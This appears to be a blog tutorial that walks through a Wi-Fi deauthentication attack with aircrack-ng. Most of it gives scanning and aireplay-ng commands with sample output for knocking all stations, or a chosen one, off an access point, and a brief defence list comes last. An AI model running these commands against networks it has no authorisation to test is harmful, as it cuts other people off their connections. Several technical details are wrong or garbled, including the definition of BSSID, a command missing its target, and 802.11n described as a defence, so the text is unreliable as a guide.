GCS HOW TO
Deauth Attack: Defense and Attack
Author - GCS : NEION-4L
Published- 9 August 2024
There are two phases of pentesting, the attack and defense phase.Attack deals with dqeauthentication attack, fuzzing, malware creation, MitM and even bypassing techniques.Defense is a more of security and privacy protection like training model to detect atttack, cryptography and generating algorithm to secure data, anonymity and much more.In the previous tutor, we've being going over defense techniques.
In this tutorial, we are going find out what a deauthenication attack is all about, using on a system and how to secure against it.
Deauthenication Attack
This is an attack whereby it sends packets to station to disconnect.This is done in the WiFi IEEE 802.11 protocol.
Disconnecting message are sent telling the stationbto disconnect and then connect back. Eventually, it is not able to re-establish connection due to continuous deauthenication packets from the attacker.Then the hacker is the only one to be connected, since the deauthentication frame being sent only to victims.
Setting up environment
Aircrack-NG suite are set of tools used in WiFi hacking, monitoring WiFi Networks, Password Cracking for WiFi and so much more. It includes:
- Aireplay-ng
- Airodump-ng
- Airodump-ng
- Airoserv-ng
- Airbase-ng
- Aircrack-ng
Now we install Aircrack-NG package using:
1. sudo su
2.apt-get install aircrack-ng
Aircrack-NG requires root privileges since it need to have some control to the network interface.
Deauthentication:Monitor
To use aircrack-ng, use need to know the channel it operates on the BSSID(short for Service Set Identifier and is the MAC address of the system) afor both the station and access point and the ESSID (network name).But first let's monitor our network (wlan0) interface.
root@kali: ~# sudo airodump-ng wlan0
Found 3 processes that could cause trouble.
Killing them by request...
Interface Chipset Driver
wlan0 Intel ath9k - [phy0]
(monitor mode enabled on mon0)
Now we monitor our wlan0 interface using airodump-ng to monitor the network
root@kali: ~# airodump-ng wlan0
CH 6 ][ Elapsed: 3 mins ][ 2024-08-09 14:42
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
XX:XX:XX:XX:XX:XX -53 180 35 0 6 54e WPA2 CCMP PSK TargetNetwork
BSSID STATION PWR Rate Lost Frames Probe
XX:XX:XX:XX:XX:XX YY:YY:YY:YY:YY:YY -63 1e- 0 0 101
XX:XX:XX:XX:XX:XX ZZ:ZZ:ZZ:ZZ:ZZ:ZZ -69 1e- 1 3 42
XX:XX:XX:XX:XX:XX AA:AA:AA:AA:AA:AA -75 6e- 1 7 53
The topmost system is the access point will while the others the others are the various station connected to the access point.
Now we have the details, we decide to disconnect all station and then no one can use the access point. Totally Cool.
Deauthentication: Attack
Now we'ce gotten the details, we use aireplay-ng to send deauthentication frame to target to we could broadcast the message to all.
To all:
1.root@kali: ~# aireplay-ng --deauth 0 -a wlan0mon
17:28:41 Sending DeAuth to broadcast -- BSSID: XX:XX:XX:XX:XX:XX
17:28:42 Sending DeAuth to broadcast -- BSSID: XX:XX:XX:XX:XX:XX
17:28:43 Sending DeAuth to broadcast -- BSSID: XX:XX:XX:XX:XX:XX
17:28:44 Sending DeAuth to broadcast -- BSSID: XX:XX:XX:XX:XX:XX
17:28:45 Sending DeAuth to broadcast -- BSSID: XX:XX:XX:XX:XX:XX
17:28:46 Sending DeAuth to broadcast -- BSSID: XX:XX:XX:XX:XX:XX
...
For station:
1. root@kali: ~# sudo aireplay-ng --deauth 10 -a XX:XX:XX:XX:XX:XX -c ZZ:ZZ:ZZ:ZZ:ZZ:ZZ wlan0
17:28:41 Sending DeAuth to ZZ:ZZ:ZZ:ZZ:ZZ:ZZ -- BSSID: XX:XX:XX:XX:XX:XX
17:28:42 Sending DeAuth to ZZ:ZZ:ZZ:ZZ:ZZ:ZZ -- BSSID: XX:XX:XX:XX:XX:XX
17:28:43 Sending DeAuth to ZZ:ZZ:ZZ:ZZ:ZZ:ZZ -- BSSID: XX:XX:XX:XX:XX:XX
17:28:44 Sending DeAuth to ZZ:ZZ:ZZ:ZZ:ZZ:ZZ -- BSSID: XX:XX:XX:XX:XX:XX
17:28:45 Sending DeAuth to ZZ:ZZ:ZZ:ZZ:ZZ:ZZ -- BSSID: XX:XX:XX:XX:XX:XX
...
...
- --deauth: Indicate a deauthentication attack
- 10 : Number of packets.Setting to 0 will make it infinite
- -a Access Point
- -c: Station
- wlan0: Network Interface
And now if we check our interface again we will notice that most station of our target are no longer showing station being logged out of network.
1. root@kali: ~# airmon-ng wlan0
BSSID STATION PWR Rate Lost Frames Probe
XX:XX:XX:XX:XX:XX YY:YY:YY:YY:YY:YY -63 0e-24 0 42
Deauthentication Attack:Defense
Aircrack-NG suite based attack can really be harmful especially on the basics of confidential issues. Like maybe you may be uploading your new package that took you months to finish and you get disconnected and you can't find your folder. This will be really killing in most cases. So most techniques are here to back up:
- The WPA3 encryption: WEP, WPA,WPA2 are all vulnerable to this attack. But WPA3 has better security measure to prevent spoofed deauthentication attack
- 802.11n Protocol: The IEEE implement different protocol for WiFi encryption and one is the 802.11n protocol. This is above the 802.11 protocol and others like 802.11q, 802.11w can also be set. This is possible both on the WPA2 and WPA3 algorithm.
- Monitor Networkconstantly with tools